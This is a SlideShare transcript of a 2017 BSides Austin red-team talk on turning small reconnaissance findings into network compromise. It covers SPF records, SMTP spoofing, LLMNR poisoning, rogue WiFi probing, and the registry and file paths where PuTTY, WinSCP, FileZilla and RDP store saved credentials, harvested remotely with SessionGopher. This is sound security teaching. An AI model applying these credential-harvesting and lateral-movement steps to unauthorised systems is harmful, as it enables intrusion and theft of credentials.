Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Breadcrumbs to Loaves: BSides Austin '17

376 views

Published on

Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi

Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Breadcrumbs to Loaves: BSides Austin '17

  1. 1. Copyright © FireEye, Inc. All rights reserved.1 Brandon Arvanaghi @arvanaghi Breadcrumbs to LoavesHow Tidbits of Information Lead Us to Full-Scale Compromise
  2. 2. Copyright © FireEye, Inc. All rights reserved.2 Brandon Arvanaghi (@arvanaghi) • Security Consultant at Mandiant • Webshell detection, post-exploitation, sandbox detection tools • Researched automated attack plan generation at Vanderbilt University
  3. 3. Copyright © FireEye, Inc. All rights reserved.3 Breadcrumbs • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation • Types of breadcrumbs: • Open Source Intelligence Gathering (OSINT)/External • Wireless • Internal (physical connection connection) • Post-exploitation – Bulk of Talk • SessionGopher – tool I developed to discover Unix systems and jump boxes https://github.com/fireeye/SessionGopher
  4. 4. Copyright © FireEye, Inc. All rights reserved.4 OSINT/EXTERNAL BREADCRUMBS
  5. 5. Copyright © FireEye, Inc. All rights reserved.5 Crumb #1: SPF Records • Sender Policy Framework • You own example.com • Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers • Solution: SPF record at example.com’s DNS zone. Says “you should only see emails from @example.com from the following IP addresses: ….” • Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
  6. 6. Copyright © FireEye, Inc. All rights reserved.6 Crumb #1: SPF Records • As an attacker, SPF records provide insight into third parties • Sometimes, companies want third parties to be able to send mail on their behalf • E.g. example of LinkedIn trusting DocuSign to send emails from https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf- records • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
  7. 7. Copyright © FireEye, Inc. All rights reserved.7 Crumb #2: Subsidiaries • Company only as strong as its weakest link • Mergers and Acquisitions • Due diligence • Cyber insurance
  8. 8. Copyright © FireEye, Inc. All rights reserved.8
  9. 9. Crumb #3: Unauthenticated SMTP Server • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees • Without authentication, you can spoof any internal email address! http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp- commands-via-gmail
  10. 10. Copyright © FireEye, Inc. All rights reserved.12 INTERNAL BREADCRUMBS
  11. 11. Copyright © FireEye, Inc. All rights reserved.13 Crumb #1: LLMNR • LLMNR = Link-Local Multicast Name Resolution • Hosts on the same link (subnet) can resolve DNS queries, as opposed to just relying on DNS server • Peer-to-peer, decentralized • Fast • Multicast • Implicitly trust everyone • Responder by SpiderLabs
  12. 12. Unicast Example I’m a PC DNSStandard DNS query
  13. 13. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 Great! I’m coming to: I’m a PC
  14. 14. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 ✅I’m a PC
  15. 15. Multicast Example LLMNR Hi everyone! Where’s confluence.corp.com? That’s me! 10.1.40.15, come over! 10.1.40.15 I’m a PC
  16. 16. Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15 Great! I’m coming to:
  17. 17. Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15
  18. 18. Copyright © FireEye, Inc. All rights reserved.20 Crumb #2: IT HelpDesk/Intranet • Company helpdesk sites often lack authentication • Real examples from engagements: • “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3” • Excel file storing Unix system passwords
  19. 19. Copyright © FireEye, Inc. All rights reserved.21 Crumb #2: IT HelpDesk/Intranet 1. Nmap scan across subnets 2. Run EyeWitness by Christopher Truncer
  20. 20. Copyright © FireEye, Inc. All rights reserved.22 Crumb #3: Anonymous Shares • Publically available shared folders that do not require any form of authentication • Often out of perceived necessity • Contractors, vendors • Result: plaintext password files
  21. 21. Copyright © FireEye, Inc. All rights reserved.23 Crumb #4: When Hostnames Make Sense • Use PowerView or ADExplorer to get lists of hostnames • Nonintrusive way to understand the role of each system without doing Nmap scans • SQLWIN7.CORP.COM • MAIL01.CORP.COM • MEDIA-BKUP.CORP.COM
  22. 22. Copyright © FireEye, Inc. All rights reserved.24 WIRELESS BREADCRUMBS
  23. 23. Copyright © FireEye, Inc. All rights reserved.25 Crumb #1: Guest Network Host Visibility • Guest networks should be segregated. This is not always done properly. • Visible hosts with visible services can lead to lateral movement onto corporate network • Pivot!
  24. 24. Copyright © FireEye, Inc. All rights reserved.26 Crumb #2: Remembered Networks • Your device probes for every single access point it remembers having associated • Yells out known SSID names indiscriminately • WiFi Pineapple responds any probe, automatically connecting you • Direct your traffic to internet while reading all unencrypted traffic • Quietly changing HTTPS requests to HTTP
  25. 25. Copyright © FireEye, Inc. All rights reserved.27 Remembered Networks: Real Mandiant Engagement
  26. 26. Copyright © FireEye, Inc. All rights reserved.28 Remembered Networks: Real Mandiant Engagement
  27. 27. Copyright © FireEye, Inc. All rights reserved.29 Remembered Networks: Real Mandiant Engagement associated!
  28. 28. Copyright © FireEye, Inc. All rights reserved.30 Remembered Networks: Real Mandiant Engagement associated! Visible to two different networks PsExec, WMIExec, etc.
  29. 29. 31
  30. 30. Copyright © FireEye, Inc. All rights reserved.32 POST-EXPLOITATION SessionGopher: Finding Unix Systems and Jump Boxes https://github.com/fireeye/SessionGopher
  31. 31. Copyright © FireEye, Inc. All rights reserved.33 The Registry • On many engagements, consultants are tasked with exploiting Unix systems • Intellectual property on Macbook Pros • Point of sale terminals running Linux • Etc. • Often not domain-joined! • Would be so much easier if they were • Use PowerView • How can we find & exploit them?
  32. 32. Copyright © FireEye, Inc. All rights reserved.34 The Registry • Current methodology 1. Nmap for live hosts not found in Active Directory a. Open Unix ports 2. netstat domain-joined systems, look for active connections over Unix ports 3. Search Active Directory for groups like “Linux Admins” & “Mac Admins” a. Find their members’ workstations, active sessions • Methodology relies on luck and active sessions. Better way?
  33. 33. Copyright © FireEye, Inc. All rights reserved.35 The Registry • HKEY_USERS • Persistent storage of saved session for any user who has logged in! • Users don’t have to be currently logged in • Though Unix systems not domain-joined, they are often managed by domain-joined Windows systems • Valuable artifacts on these hosts • Solves our “active session” problem • But what can we find in this magical hive that helps us exploit Unix systems?
  34. 34. Copyright © FireEye, Inc. All rights reserved.36 The Registry
  35. 35. Copyright © FireEye, Inc. All rights reserved.37 Solution 1. Find artifacts left by tools typically used to access Unix systems. 2. If they exist, then saved sessions might exist. Extract ’em.
  36. 36. Copyright © FireEye, Inc. All rights reserved.38 Tools • WinSCP • FileZilla • PuTTY • SuperPuTTY • VNC • RDP • More!
  37. 37. Copyright © FireEye, Inc. All rights reserved.39 Paths to Sessions Stored in Registry • PuTTY • HKEY_USERS<SID>SOFTWARESimonTathamPuTTYSessions • WinSCP • HKEY_USERS<SID>SOFTWAREMartin PrikrylWinSCP 2Sessions • Microsoft Remote Desktop • HKEY_USERS<SID> SOFTWAREMicrosoftTerminal Server ClientServers Non-registry (assumes filename/location unchanged) • FileZilla • <Drive>:Users<Username>AppDataRoamingFileZillasitemanager.xml • SuperPuTTY • <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
  38. 38. Copyright © FireEye, Inc. All rights reserved.40 WinSCP HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2Sessions<SessionName> HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
  39. 39. Copyright © FireEye, Inc. All rights reserved.41
  40. 40. Copyright © FireEye, Inc. All rights reserved.42 WinSCP
  41. 41. Copyright © FireEye, Inc. All rights reserved.43 Paths to Sessions • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
  42. 42. Copyright © FireEye, Inc. All rights reserved.44 FileZilla <Drive>:Users<Username>AppDataRoamingFileZillaSiteManager.xml
  43. 43. Copyright © FireEye, Inc. All rights reserved.45 SuperPuTTY <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml • ExtraArgs field can contain plaintext password
  44. 44. Copyright © FireEye, Inc. All rights reserved.46 PuTTY .ppk Files • One-click PuTTY logins • Key can be plaintext (as in here) or encrypted
  45. 45. Copyright © FireEye, Inc. All rights reserved.47 Microsoft .rdp Files • Executable, can be read by dragging into text editor • Plethora of arguments, many optional • Host, if admin, prompt for credentials, etc. • Fieldname:TypeOfField:Value • TypeOfField = Integer or String
  46. 46. Copyright © FireEye, Inc. All rights reserved.48
  47. 47. Copyright © FireEye, Inc. All rights reserved.49
  48. 48. Copyright © FireEye, Inc. All rights reserved.50 Windows Management Instrumentation (WMI) • Rather than running SessionGopher on each computer (impractical), we can use WMI • Built-in “Invoke-WmiMethod” command in PowerShell • Remote registry querying ability
  49. 49. Copyright © FireEye, Inc. All rights reserved.51
  50. 50. Copyright © FireEye, Inc. All rights reserved.52 Write to CSV (Invoke-SessionGopher –o) • Create a physical mapping of the network • Aggregate all session data across entire domain or targeted computers • Essentially, see the physical infrastructure of network!
  51. 51. Copyright © FireEye, Inc. All rights reserved.53 QUESTIONS? Twitter: @arvanaghi Github: https://github.com/fireeye/SessionGopher Brandon Arvanaghi

×